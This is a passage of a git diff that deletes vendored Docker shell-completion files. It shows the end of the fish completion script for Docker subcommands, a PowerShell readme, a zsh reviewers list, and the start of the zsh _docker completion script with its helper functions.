-complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s f -l filter -d 'Provide filter values. Valid filters:' -complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s l -l latest -d 'Show only the latest created container, include non-running ones.' -complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s n -d 'Show n last created containers, include non-running ones.' -complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -l no-trunc -d "Don't truncate output" -complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s q -l quiet -d 'Only display numeric IDs' -complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s s -l size -d 'Display total file sizes' -complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -l since -d 'Show only containers created since Id or Name, include non-running ones.' - -# pull -complete -c docker -f -n '__fish_docker_no_subcommand' -a pull -d 'Pull an image or a repository from a Docker registry server' -complete -c docker -A -f -n '__fish_seen_subcommand_from pull' -s a -l all-tags -d 'Download all tagged images in the repository' -complete -c docker -A -f -n '__fish_seen_subcommand_from pull' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from pull' -a '(__fish_print_docker_images)' -d "Image" -complete -c docker -A -f -n '__fish_seen_subcommand_from pull' -a '(__fish_print_docker_repositories)' -d "Repository" - -# push -complete -c docker -f -n '__fish_docker_no_subcommand' -a push -d 'Push an image or a repository to a Docker registry server' -complete -c docker -A -f -n '__fish_seen_subcommand_from push' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from push' -a '(__fish_print_docker_images)' -d "Image" -complete -c docker -A -f -n '__fish_seen_subcommand_from push' -a '(__fish_print_docker_repositories)' -d "Repository" - -# 
rename -complete -c docker -f -n '__fish_docker_no_subcommand' -a rename -d 'Rename an existing container' - -# restart -complete -c docker -f -n '__fish_docker_no_subcommand' -a restart -d 'Restart a container' -complete -c docker -A -f -n '__fish_seen_subcommand_from restart' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from restart' -s t -l time -d 'Number of seconds to try to stop for before killing the container. Once killed it will then be restarted. Default is 10 seconds.' -complete -c docker -A -f -n '__fish_seen_subcommand_from restart' -a '(__fish_print_docker_containers running)' -d "Container" - -# rm -complete -c docker -f -n '__fish_docker_no_subcommand' -a rm -d 'Remove one or more containers' -complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -s f -l force -d 'Force the removal of a running container (uses SIGKILL)' -complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -s l -l link -d 'Remove the specified link and not the underlying container' -complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -s v -l volumes -d 'Remove the volumes associated with the container' -complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -a '(__fish_print_docker_containers stopped)' -d "Container" -complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -s f -l force -a '(__fish_print_docker_containers all)' -d "Container" - -# rmi -complete -c docker -f -n '__fish_docker_no_subcommand' -a rmi -d 'Remove one or more images' -complete -c docker -A -f -n '__fish_seen_subcommand_from rmi' -s f -l force -d 'Force removal of the image' -complete -c docker -A -f -n '__fish_seen_subcommand_from rmi' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from rmi' -l no-prune -d 'Do not delete untagged parents' -complete -c docker -A -f -n '__fish_seen_subcommand_from rmi' -a 
'(__fish_print_docker_images)' -d "Image" - -# run -complete -c docker -f -n '__fish_docker_no_subcommand' -a run -d 'Run a command in a new container' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s a -l attach -d 'Attach to STDIN, STDOUT or STDERR.' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l add-host -d 'Add a custom host-to-IP mapping (host:ip)' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s c -l cpu-shares -d 'CPU shares (relative weight)' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l cap-add -d 'Add Linux capabilities' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l cap-drop -d 'Drop Linux capabilities' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l cidfile -d 'Write the container ID to the file' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l cpuset -d 'CPUs in which to allow execution (0-3, 0,1)' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s d -l detach -d 'Detached mode: run the container in the background and print the new container ID' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l device -d 'Add a host device to the container (e.g. --device=/dev/sdc:/dev/xvdc:rwm)' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l dns -d 'Set custom DNS servers' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l dns-opt -d "Set custom DNS options (Use --dns-opt='' if you don't wish to set options)" -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l dns-search -d "Set custom DNS search domains (Use --dns-search=. 
if you don't wish to set the search domain)" -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s e -l env -d 'Set environment variables' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l entrypoint -d 'Overwrite the default ENTRYPOINT of the image' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l env-file -d 'Read in a line delimited file of environment variables' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l expose -d 'Expose a port or a range of ports (e.g. --expose=3300-3310) from the container without publishing it to your host' -complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l group-add -d 'Add additional groups to run as' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s h -l hostname -d 'Container host name' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s i -l interactive -d 'Keep STDIN open even if not attached' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l ipc -d 'Default is to create a private IPC namespace (POSIX SysV IPC) for the container' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l link -d 'Add link to another container in the form of :alias' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s m -l memory -d 'Memory limit (format: [], where unit = b, k, m or g)' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l mac-address -d 'Container MAC address (e.g. 
92:d0:c6:0a:29:33)' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l memory-swap -d "Total memory usage (memory + swap), set '-1' to disable swap (format: [], where unit = b, k, m or g)" -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l name -d 'Assign a name to the container' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l net -d 'Set the Network mode for the container' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s P -l publish-all -d 'Publish all exposed ports to random ports on the host interfaces' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s p -l publish -d "Publish a container's port to the host" -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l pid -d 'Default is to create a private PID namespace for the container' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l privileged -d 'Give extended privileges to this container' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l read-only -d "Mount the container's root filesystem as read only" -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l restart -d 'Restart policy to apply when a container exits (no, on-failure[:max-retry], always)' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l rm -d 'Automatically remove the container when it exits (incompatible with -d)' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l security-opt -d 'Security Options' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l sig-proxy -d 'Proxy received signals to the process (non-TTY mode only). SIGCHLD, SIGSTOP, and SIGKILL are not proxied.' 
-complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l stop-signal -d 'Signal to kill a container' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s t -l tty -d 'Allocate a pseudo-TTY' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s u -l user -d 'Username or UID' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l tmpfs -d 'Mount tmpfs on a directory' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s v -l volume -d 'Bind mount a volume (e.g., from the host: -v /host:/container, from Docker: -v /container)' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l volumes-from -d 'Mount volumes from the specified container(s)' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s w -l workdir -d 'Working directory inside the container' -complete -c docker -A -f -n '__fish_seen_subcommand_from run' -a '(__fish_print_docker_images)' -d "Image" - -# save -complete -c docker -f -n '__fish_docker_no_subcommand' -a save -d 'Save an image to a tar archive' -complete -c docker -A -f -n '__fish_seen_subcommand_from save' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from save' -s o -l output -d 'Write to an file, instead of STDOUT' -complete -c docker -A -f -n '__fish_seen_subcommand_from save' -a '(__fish_print_docker_images)' -d "Image" - -# search -complete -c docker -f -n '__fish_docker_no_subcommand' -a search -d 'Search for an image on the registry (defaults to the Docker Hub)' -complete -c docker -A -f -n '__fish_seen_subcommand_from search' -l automated -d 'Only show automated builds' -complete -c docker -A -f -n '__fish_seen_subcommand_from search' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from search' -l no-trunc -d "Don't truncate output" -complete -c docker -A -f -n '__fish_seen_subcommand_from search' -s s -l stars -d 'Only displays with at least x stars' - -# start -complete -c docker -f -n 
'__fish_docker_no_subcommand' -a start -d 'Start a container' -complete -c docker -A -f -n '__fish_seen_subcommand_from start' -s a -l attach -d "Attach container's STDOUT and STDERR and forward all signals to the process" -complete -c docker -A -f -n '__fish_seen_subcommand_from start' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from start' -s i -l interactive -d "Attach container's STDIN" -complete -c docker -A -f -n '__fish_seen_subcommand_from start' -a '(__fish_print_docker_containers stopped)' -d "Container" - -# stats -complete -c docker -f -n '__fish_docker_no_subcommand' -a stats -d "Display a live stream of one or more containers' resource usage statistics" -complete -c docker -A -f -n '__fish_seen_subcommand_from stats' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from stats' -l no-stream -d 'Disable streaming stats and only pull the first result' -complete -c docker -A -f -n '__fish_seen_subcommand_from stats' -a '(__fish_print_docker_containers running)' -d "Container" - -# stop -complete -c docker -f -n '__fish_docker_no_subcommand' -a stop -d 'Stop a container' -complete -c docker -A -f -n '__fish_seen_subcommand_from stop' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from stop' -s t -l time -d 'Number of seconds to wait for the container to stop before killing it. Default is 10 seconds.' 
-complete -c docker -A -f -n '__fish_seen_subcommand_from stop' -a '(__fish_print_docker_containers running)' -d "Container" - -# tag -complete -c docker -f -n '__fish_docker_no_subcommand' -a tag -d 'Tag an image into a repository' -complete -c docker -A -f -n '__fish_seen_subcommand_from tag' -s f -l force -d 'Force' -complete -c docker -A -f -n '__fish_seen_subcommand_from tag' -l help -d 'Print usage' - -# top -complete -c docker -f -n '__fish_docker_no_subcommand' -a top -d 'Lookup the running processes of a container' -complete -c docker -A -f -n '__fish_seen_subcommand_from top' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from top' -a '(__fish_print_docker_containers running)' -d "Container" - -# unpause -complete -c docker -f -n '__fish_docker_no_subcommand' -a unpause -d 'Unpause a paused container' -complete -c docker -A -f -n '__fish_seen_subcommand_from unpause' -a '(__fish_print_docker_containers running)' -d "Container" - -# version -complete -c docker -f -n '__fish_docker_no_subcommand' -a version -d 'Show the Docker version information' -complete -c docker -A -f -n '__fish_seen_subcommand_from version' -s f -l format -d 'Format the output using the given go template' -complete -c docker -A -f -n '__fish_seen_subcommand_from version' -l help -d 'Print usage' - -# wait -complete -c docker -f -n '__fish_docker_no_subcommand' -a wait -d 'Block until a container stops, then print its exit code' -complete -c docker -A -f -n '__fish_seen_subcommand_from wait' -l help -d 'Print usage' -complete -c docker -A -f -n '__fish_seen_subcommand_from wait' -a '(__fish_print_docker_containers running)' -d "Container" diff --git a/vendor/github.com/docker/docker/contrib/completion/powershell/readme.txt b/vendor/github.com/docker/docker/contrib/completion/powershell/readme.txt deleted file mode 100644 index 18e1b53c13..0000000000 --- a/vendor/github.com/docker/docker/contrib/completion/powershell/readme.txt +++ /dev/null @@ -1 +0,0 @@ 
-See https://github.com/samneirinck/posh-docker \ No newline at end of file diff --git a/vendor/github.com/docker/docker/contrib/completion/zsh/REVIEWERS b/vendor/github.com/docker/docker/contrib/completion/zsh/REVIEWERS deleted file mode 100644 index 03ee2dde3d..0000000000 --- a/vendor/github.com/docker/docker/contrib/completion/zsh/REVIEWERS +++ /dev/null @@ -1,2 +0,0 @@ -Tianon Gravi (@tianon) -Jessie Frazelle (@jfrazelle) diff --git a/vendor/github.com/docker/docker/contrib/completion/zsh/_docker b/vendor/github.com/docker/docker/contrib/completion/zsh/_docker deleted file mode 100644 index ecae826a4a..0000000000 --- a/vendor/github.com/docker/docker/contrib/completion/zsh/_docker +++ /dev/null @@ -1,2787 +0,0 @@ -#compdef docker dockerd -# -# zsh completion for docker (http://docker.com) -# -# version: 0.3.0 -# github: https://github.com/felixr/docker-zsh-completion -# -# contributors: -# - Felix Riedel -# - Steve Durrheimer -# - Vincent Bernat -# -# license: -# -# Copyright (c) 2013, Felix Riedel -# All rights reserved. -# -# Redistribution and use in source and binary forms, with or without -# modification, are permitted provided that the following conditions are met: -# * Redistributions of source code must retain the above copyright -# notice, this list of conditions and the following disclaimer. -# * Redistributions in binary form must reproduce the above copyright -# notice, this list of conditions and the following disclaimer in the -# documentation and/or other materials provided with the distribution. -# * Neither the name of the nor the -# names of its contributors may be used to endorse or promote products -# derived from this software without specific prior written permission. -# -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND -# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -# DISCLAIMED. 
IN NO EVENT SHALL BE LIABLE FOR ANY -# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -# - -# Short-option stacking can be enabled with: -# zstyle ':completion:*:*:docker:*' option-stacking yes -# zstyle ':completion:*:*:docker-*:*' option-stacking yes -__docker_arguments() { - if zstyle -t ":completion:${curcontext}:" option-stacking; then - print -- -s - fi -} - -__docker_get_containers() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - local kind type line s - declare -a running stopped lines args names - - kind=$1; shift - type=$1; shift - [[ $kind = (stopped|all) ]] && args=($args -a) - - lines=(${(f)${:-"$(_call_program commands docker $docker_options ps --format 'table' --no-trunc $args)"$'\n'}}) - - # Parse header line to find columns - local i=1 j=1 k header=${lines[1]} - declare -A begin end - while (( j < ${#header} - 1 )); do - i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) - j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) - k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) - begin[${header[$i,$((j-1))]}]=$i - end[${header[$i,$((j-1))]}]=$k - done - end[${header[$i,$((j-1))]}]=-1 # Last column, should go to the end of the line - lines=(${lines[2,-1]}) - - # Container ID - if [[ $type = (ids|all) ]]; then - for line in $lines; do - s="${${line[${begin[CONTAINER ID]},${end[CONTAINER ID]}]%% ##}[0,12]}" - s="$s:${(l:15:: :::)${${line[${begin[CREATED]},${end[CREATED]}]/ ago/}%% ##}}" - s="$s, ${${${line[${begin[IMAGE]},${end[IMAGE]}]}/:/\\:}%% ##}" - if [[ ${line[${begin[STATUS]},${end[STATUS]}]} = Exit* ]]; then - stopped=($stopped $s) - else - 
running=($running $s) - fi - done - fi - - # Names: we only display the one without slash. All other names - # are generated and may clutter the completion. However, with - # Swarm, all names may be prefixed by the swarm node name. - if [[ $type = (names|all) ]]; then - for line in $lines; do - names=(${(ps:,:)${${line[${begin[NAMES]},${end[NAMES]}]}%% *}}) - # First step: find a common prefix and strip it (swarm node case) - (( ${#${(u)names%%/*}} == 1 )) && names=${names#${names[1]%%/*}/} - # Second step: only keep the first name without a / - s=${${names:#*/*}[1]} - # If no name, well give up. - (( $#s != 0 )) || continue - s="$s:${(l:15:: :::)${${line[${begin[CREATED]},${end[CREATED]}]/ ago/}%% ##}}" - s="$s, ${${${line[${begin[IMAGE]},${end[IMAGE]}]}/:/\\:}%% ##}" - if [[ ${line[${begin[STATUS]},${end[STATUS]}]} = Exit* ]]; then - stopped=($stopped $s) - else - running=($running $s) - fi - done - fi - - [[ $kind = (running|all) ]] && _describe -t containers-running "running containers" running "$@" && ret=0 - [[ $kind = (stopped|all) ]] && _describe -t containers-stopped "stopped containers" stopped "$@" && ret=0 - return ret -} - -__docker_complete_stopped_containers() { - [[ $PREFIX = -* ]] && return 1 - __docker_get_containers stopped all "$@" -} - -__docker_complete_running_containers() { - [[ $PREFIX = -* ]] && return 1 - __docker_get_containers running all "$@" -} - -__docker_complete_containers() { - [[ $PREFIX = -* ]] && return 1 - __docker_get_containers all all "$@" -} - -__docker_complete_containers_ids() { - [[ $PREFIX = -* ]] && return 1 - __docker_get_containers all ids "$@" -} - -__docker_complete_containers_names() { - [[ $PREFIX = -* ]] && return 1 - __docker_get_containers all names "$@" -} - -__docker_complete_info_plugins() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - emulate -L zsh - setopt extendedglob - local -a plugins - plugins=(${(ps: :)${(M)${(f)${${"$(_call_program commands docker $docker_options 
info)"##*$'\n'Plugins:}%%$'\n'^ *}}:# $1: *}## $1: }) - _describe -t plugins "$1 plugins" plugins && ret=0 - return ret -} - -__docker_complete_images() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - declare -a images - images=(${${${(f)${:-"$(_call_program commands docker $docker_options images)"$'\n'}}[2,-1]}/(#b)([^ ]##) ##([^ ]##) ##([^ ]##)*/${match[3]}:${(r:15:: :::)match[2]} in ${match[1]}}) - _describe -t docker-images "images" images && ret=0 - __docker_complete_repositories_with_tags && ret=0 - return ret -} - -__docker_complete_repositories() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - declare -a repos - repos=(${${${(f)${:-"$(_call_program commands docker $docker_options images)"$'\n'}}%% *}[2,-1]}) - repos=(${repos#}) - _describe -t docker-repos "repositories" repos && ret=0 - return ret -} - -__docker_complete_repositories_with_tags() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - declare -a repos onlyrepos matched - declare m - repos=(${${${${(f)${:-"$(_call_program commands docker $docker_options images)"$'\n'}}[2,-1]}/ ##/:::}%% *}) - repos=(${${repos%:::}#}) - # Check if we have a prefix-match for the current prefix. 
- onlyrepos=(${repos%::*}) - for m in $onlyrepos; do - [[ ${PREFIX##${~~m}} != ${PREFIX} ]] && { - # Yes, complete with tags - repos=(${${repos/:::/:}/:/\\:}) - _describe -t docker-repos-with-tags "repositories with tags" repos && ret=0 - return ret - } - done - # No, only complete repositories - onlyrepos=(${${repos%:::*}/:/\\:}) - _describe -t docker-repos "repositories" onlyrepos -qS : && ret=0 - - return ret -} - -__docker_search() { - [[ $PREFIX = -* ]] && return 1 - local cache_policy - zstyle -s ":completion:${curcontext}:" cache-policy cache_policy - if [[ -z "$cache_policy" ]]; then - zstyle ":completion:${curcontext}:" cache-policy __docker_caching_policy - fi - - local searchterm cachename - searchterm="${words[$CURRENT]%/}" - cachename=_docker-search-$searchterm - - local expl - local -a result - if ( [[ ${(P)+cachename} -eq 0 ]] || _cache_invalid ${cachename#_} ) \ - && ! _retrieve_cache ${cachename#_}; then - _message "Searching for ${searchterm}..." - result=(${${${(f)${:-"$(_call_program commands docker $docker_options search $searchterm)"$'\n'}}%% *}[2,-1]}) - _store_cache ${cachename#_} result - fi - _wanted dockersearch expl 'available images' compadd -a result -} - -__docker_get_log_options() { - [[ $PREFIX = -* ]] && return 1 - - integer ret=1 - local log_driver=${opt_args[--log-driver]:-"all"} - local -a awslogs_options fluentd_options gelf_options journald_options json_file_options logentries_options syslog_options splunk_options - - awslogs_options=("awslogs-region" "awslogs-group" "awslogs-stream") - fluentd_options=("env" "fluentd-address" "fluentd-async-connect" "fluentd-buffer-limit" "fluentd-retry-wait" "fluentd-max-retries" "labels" "tag") - gcplogs_options=("env" "gcp-log-cmd" "gcp-project" "labels") - gelf_options=("env" "gelf-address" "gelf-compression-level" "gelf-compression-type" "labels" "tag") - journald_options=("env" "labels" "tag") - json_file_options=("env" "labels" "max-file" "max-size") - 
logentries_options=("logentries-token") - syslog_options=("env" "labels" "syslog-address" "syslog-facility" "syslog-format" "syslog-tls-ca-cert" "syslog-tls-cert" "syslog-tls-key" "syslog-tls-skip-verify" "tag") - splunk_options=("env" "labels" "splunk-caname" "splunk-capath" "splunk-format" "splunk-gzip" "splunk-gzip-level" "splunk-index" "splunk-insecureskipverify" "splunk-source" "splunk-sourcetype" "splunk-token" "splunk-url" "splunk-verify-connection" "tag") - - [[ $log_driver = (awslogs|all) ]] && _describe -t awslogs-options "awslogs options" awslogs_options "$@" && ret=0 - [[ $log_driver = (fluentd|all) ]] && _describe -t fluentd-options "fluentd options" fluentd_options "$@" && ret=0 - [[ $log_driver = (gcplogs|all) ]] && _describe -t gcplogs-options "gcplogs options" gcplogs_options "$@" && ret=0 - [[ $log_driver = (gelf|all) ]] && _describe -t gelf-options "gelf options" gelf_options "$@" && ret=0 - [[ $log_driver = (journald|all) ]] && _describe -t journald-options "journald options" journald_options "$@" && ret=0 - [[ $log_driver = (json-file|all) ]] && _describe -t json-file-options "json-file options" json_file_options "$@" && ret=0 - [[ $log_driver = (logentries|all) ]] && _describe -t logentries-options "logentries options" logentries_options "$@" && ret=0 - [[ $log_driver = (syslog|all) ]] && _describe -t syslog-options "syslog options" syslog_options "$@" && ret=0 - [[ $log_driver = (splunk|all) ]] && _describe -t splunk-options "splunk options" splunk_options "$@" && ret=0 - - return ret -} - -__docker_complete_log_drivers() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - drivers=(awslogs etwlogs fluentd gcplogs gelf journald json-file none splunk syslog) - _describe -t log-drivers "log drivers" drivers && ret=0 - return ret -} - -__docker_complete_log_options() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - (syslog-format) - syslog_format_opts=('rfc3164' 'rfc5424' 
'rfc5424micro') - _describe -t syslog-format-opts "Syslog format Options" syslog_format_opts && ret=0 - ;; - *) - _message 'value' && ret=0 - ;; - esac - else - __docker_get_log_options -qS "=" && ret=0 - fi - - return ret -} - -__docker_complete_detach_keys() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - - compset -P "*," - keys=(${:-{a-z}}) - ctrl_keys=(${:-ctrl-{{a-z},{@,'[','\\','^',']',_}}}) - _describe -t detach_keys "[a-z]" keys -qS "," && ret=0 - _describe -t detach_keys-ctrl "'ctrl-' + 'a-z @ [ \\\\ ] ^ _'" ctrl_keys -qS "," && ret=0 -} - -__docker_complete_pid() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - local -a opts vopts - - opts=('host') - vopts=('container') - - if compset -P '*:'; then - case "${${words[-1]%:*}#*=}" in - (container) - __docker_complete_running_containers && ret=0 - ;; - *) - _message 'value' && ret=0 - ;; - esac - else - _describe -t pid-value-opts "PID Options with value" vopts -qS ":" && ret=0 - _describe -t pid-opts "PID Options" opts && ret=0 - fi - - return ret -} - -__docker_complete_runtimes() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - - emulate -L zsh - setopt extendedglob - local -a runtimes_opts - runtimes_opts=(${(ps: :)${(f)${${"$(_call_program commands docker $docker_options info)"##*$'\n'Runtimes: }%%$'\n'^ *}}}) - _describe -t runtimes-opts "runtimes options" runtimes_opts && ret=0 -} - -__docker_complete_ps_filters() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - (ancestor) - __docker_complete_images && ret=0 - ;; - (before|since) - __docker_complete_containers && ret=0 - ;; - (health) - health_opts=('healthy' 'none' 'starting' 'unhealthy') - _describe -t health-filter-opts "health filter options" health_opts && ret=0 - ;; - (id) - __docker_complete_containers_ids && ret=0 - ;; - (is-task) - _describe -t boolean-filter-opts "filter options" boolean_opts && ret=0 - ;; - (name) - __docker_complete_containers_names && ret=0 - 
;; - (network) - __docker_complete_networks && ret=0 - ;; - (status) - status_opts=('created' 'dead' 'exited' 'paused' 'restarting' 'running' 'removing') - _describe -t status-filter-opts "status filter options" status_opts && ret=0 - ;; - (volume) - __docker_complete_volumes && ret=0 - ;; - *) - _message 'value' && ret=0 - ;; - esac - else - opts=('ancestor' 'before' 'exited' 'health' 'id' 'label' 'name' 'network' 'since' 'status' 'volume') - _describe -t filter-opts "Filter Options" opts -qS "=" && ret=0 - fi - - return ret -} - -__docker_complete_search_filters() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - declare -a boolean_opts opts - - boolean_opts=('true' 'false') - opts=('is-automated' 'is-official' 'stars') - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - (is-automated|is-official) - _describe -t boolean-filter-opts "filter options" boolean_opts && ret=0 - ;; - *) - _message 'value' && ret=0 - ;; - esac - else - _describe -t filter-opts "filter options" opts -qS "=" && ret=0 - fi - - return ret -} - -__docker_complete_images_filters() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - declare -a boolean_opts opts - - boolean_opts=('true' 'false') - opts=('before' 'dangling' 'label' 'reference' 'since') - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - (before|reference|since) - __docker_complete_images && ret=0 - ;; - (dangling) - _describe -t boolean-filter-opts "filter options" boolean_opts && ret=0 - ;; - *) - _message 'value' && ret=0 - ;; - esac - else - _describe -t filter-opts "Filter Options" opts -qS "=" && ret=0 - fi - - return ret -} - -__docker_complete_events_filter() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - declare -a opts - - opts=('container' 'daemon' 'event' 'image' 'label' 'network' 'type' 'volume') - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - (container) - __docker_complete_containers && ret=0 - ;; - (daemon) - emulate -L zsh - setopt extendedglob - local -a 
daemon_opts - daemon_opts=( - ${(f)${${"$(_call_program commands docker $docker_options info)"##*$'\n'Name: }%%$'\n'^ *}} - ${${(f)${${"$(_call_program commands docker $docker_options info)"##*$'\n'ID: }%%$'\n'^ *}}//:/\\:} - ) - _describe -t daemon-filter-opts "daemon filter options" daemon_opts && ret=0 - ;; - (event) - local -a event_opts - event_opts=('attach' 'commit' 'connect' 'copy' 'create' 'delete' 'destroy' 'detach' 'die' 'disconnect' 'exec_create' 'exec_detach' - 'exec_start' 'export' 'health_status' 'import' 'kill' 'load' 'mount' 'oom' 'pause' 'pull' 'push' 'reload' 'rename' 'resize' 'restart' 'save' 'start' - 'stop' 'tag' 'top' 'unmount' 'unpause' 'untag' 'update') - _describe -t event-filter-opts "event filter options" event_opts && ret=0 - ;; - (image) - __docker_complete_images && ret=0 - ;; - (network) - __docker_complete_networks && ret=0 - ;; - (type) - local -a type_opts - type_opts=('container' 'daemon' 'image' 'network' 'volume') - _describe -t type-filter-opts "type filter options" type_opts && ret=0 - ;; - (volume) - __docker_complete_volumes && ret=0 - ;; - *) - _message 'value' && ret=0 - ;; - esac - else - _describe -t filter-opts "filter options" opts -qS "=" && ret=0 - fi - - return ret -} - -__docker_complete_prune_filters() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - declare -a opts - - opts=('until') - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - *) - _message 'value' && ret=0 - ;; - esac - else - _describe -t filter-opts "filter options" opts -qS "=" && ret=0 - fi - - return ret -} - -# BO container - -__docker_container_commands() { - local -a _docker_container_subcommands - _docker_container_subcommands=( - "attach:Attach to a running container" - "commit:Create a new image from a container's changes" - "cp:Copy files/folders between a container and the local filesystem" - "create:Create a new container" - "diff:Inspect changes on a container's filesystem" - "exec:Run a command in a running container" - 
"export:Export a container's filesystem as a tar archive" - "inspect:Display detailed information on one or more containers" - "kill:Kill one or more running containers" - "logs:Fetch the logs of a container" - "ls:List containers" - "pause:Pause all processes within one or more containers" - "port:List port mappings or a specific mapping for the container" - "prune:Remove all stopped containers" - "rename:Rename a container" - "restart:Restart one or more containers" - "rm:Remove one or more containers" - "run:Run a command in a new container" - "start:Start one or more stopped containers" - "stats:Display a live stream of container(s) resource usage statistics" - "stop:Stop one or more running containers" - "top:Display the running processes of a container" - "unpause:Unpause all processes within one or more containers" - "update:Update configuration of one or more containers" - "wait:Block until one or more containers stop, then print their exit codes" - ) - _describe -t docker-container-commands "docker container command" _docker_container_subcommands -} - -__docker_container_subcommand() { - local -a _command_args opts_help opts_attach_exec_run_start opts_create_run opts_create_run_update - local expl help="--help" - integer ret=1 - - opts_attach_exec_run_start=( - "($help)--detach-keys=[Escape key sequence used to detach a container]:sequence:__docker_complete_detach_keys" - ) - opts_create_run=( - "($help -a --attach)"{-a=,--attach=}"[Attach to stdin, stdout 